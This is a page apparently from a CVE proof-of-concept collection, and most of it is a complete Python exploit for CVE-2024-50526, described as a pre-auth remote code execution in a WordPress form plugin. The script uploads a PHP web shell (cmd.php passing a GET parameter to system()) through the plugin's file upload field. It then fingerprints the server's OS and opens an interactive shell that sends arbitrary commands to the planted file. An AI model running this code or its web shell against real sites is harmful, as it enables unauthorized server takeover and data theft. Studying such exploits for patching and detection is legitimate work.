4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-50526
README.md
Rendering markdown...
POC / CVE-2024-50526.py PY
⬇ Raw GitHub ✕ Close 
import requests
import argparse
import time

# Configuración de argparse
parser = argparse.ArgumentParser(description="Script to upload a PHP file and enumerate final upload directory.")
parser.add_argument(
    "--target",
    type=str,
    required=True,
    help="The URL of the target form (e.g., http://localhost/wordpress_lab/mpmf-1/)."
)
parser.add_argument(
    "--form-name",
    type=str,
    required=True,
    help="The value of the form_id field (e.g., hkh)."
)
args = parser.parse_args()

def print_message(message, icon):
    """Print messages in the CLI with formatted icons."""
    print(f"{icon} {message}")
    time.sleep(1.5)  # Delay entre mensajes importantes

# Banner ASCII
def banner():
    banner = r"""
   _______    ________    ___   ____ ___  __ __        __________  _________   _____
  / ____/ |  / / ____/   |__ \ / __ \__ \/ // /       / ____/ __ \/ ____/__ \ / ___/
 / /    | | / / __/________/ // / / /_/ / // /_______/___ \/ / / /___ \ __/ // __ \ 
/ /___  | |/ / /__/_____/ __// /_/ / __/__  __/_____/___/ / /_/ /___/ // __// /_/ / 
\____/  |___/_____/    /____/\____/____/ /_/       /_____/\____/_____//____/\____/  
        
    0-click RCE (Unauthenticated / Pre-auth) Exploit for CVE-2024-50526
                coded by @JoshuaProvoste (jp / kw0)

"""
    print(banner)
banner()

# Definir la URL del endpoint
url = args.target
form_name = args.form_name
base_url = args.target.rsplit("/", 2)[0] + "/"

# Cabeceras de la solicitud
headers = {
    "Host": "localhost",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate, br",
    "Origin": "http://localhost",
    "DNT": "1",
    "Sec-GPC": "1",
    "Connection": "keep-alive",
    "Referer": url,
    "Upgrade-Insecure-Requests": "1",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-User": "?1",
    "Priority": "u=0, i",
}

# Contenido del archivo PHP que se subirá
php_payload = """<?php
if (php_sapi_name() !== 'cli' && !isset($_GET['cmd'])) {
    echo 'System OS: ' . php_uname('s');
}
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>"""

# Datos del formulario y archivo
files = {
    "file1": ("cmd.php", php_payload, "application/octet-stream"),
}

data = {
    "form_name": form_name,
    "field_label1": "",
    "countcalculated": "1",
    "count_files": "1",
    "count": "2",
    "mpmf_form_id": "1",
    "custom_form_action": "send_data",
    "send": "Submit",
}

# Realizar la solicitud POST
response = requests.post(url, headers=headers, files=files, data=data)

# Validar el estado HTTP y mostrar solo el mensaje de éxito o error
if response.status_code == 200:
    print("[+] File upload successful!")
else:
    print(f"[-] File upload failed with status code {response.status_code}.")

try:
    # Validar la existencia del payload cmd.php
    payload_url = f"{base_url}/wp-content/uploads/mpmf_uploads/cmd.php"
    print("[+] Verifying payload...")
    if response.status_code == 200:
        print(f"[+] Payload is accessible: {payload_url}")
    else:
        print("[-] Payload not found.")
except requests.RequestException as e:
    print(f"[-] Error while verifying payload: {e}")

print_message("Detecting operating system from the target...", "[+]")
try:
    payload_url = f"{base_url}/wp-content/uploads/mpmf_uploads/cmd.php"
    os_response = requests.get(payload_url).text.strip().lower()
    if "windows" in os_response:
        print_message("Detected OS: Windows (only Windows commands can be executed).", "[+]")
    elif "linux" in os_response:
        print_message("Detected OS: Linux (only Linux commands can be executed).", "[+]")
    else:
        print_message("Failed to detect operating system. Defaulting to generic commands.", "[-]")
except requests.exceptions.RequestException as e:
    print_message(f"Failed to detect operating system: {e}", "[-]")
    exit(1)

# Iniciar shell interactiva
print_message("Entering interactive shell mode...\n", "[+]")
print("Type 'exit' or 'Ctrl+C' to leave.\n")

try:
    while True:
        command = input("shell> ")
        if command.lower() == "exit":
            print_message("Exiting interactive shell.", "[+]")
            break

        # Enviar el comando al payload
        try:
            payload_url = f"{base_url}/wp-content/uploads/mpmf_uploads/cmd.php"
            get_response = requests.get(payload_url, params={"cmd": command})
            if get_response.status_code == 200:
                if get_response.text.strip():
                    print(get_response.text.strip())  # Mostrar la salida del comando si no está vacía
                else:
                    print_message("Command executed, but no output was returned.", "[+]")
            else:
                print_message(f"Command execution failed. HTTP Status: {get_response.status_code}", "[-]")
        except requests.exceptions.RequestException as e:
            print_message(f"Error during command execution: {e}", "[-]")
except KeyboardInterrupt:
    print("\nKeyboard interrupt detected. Exiting interactive shell.")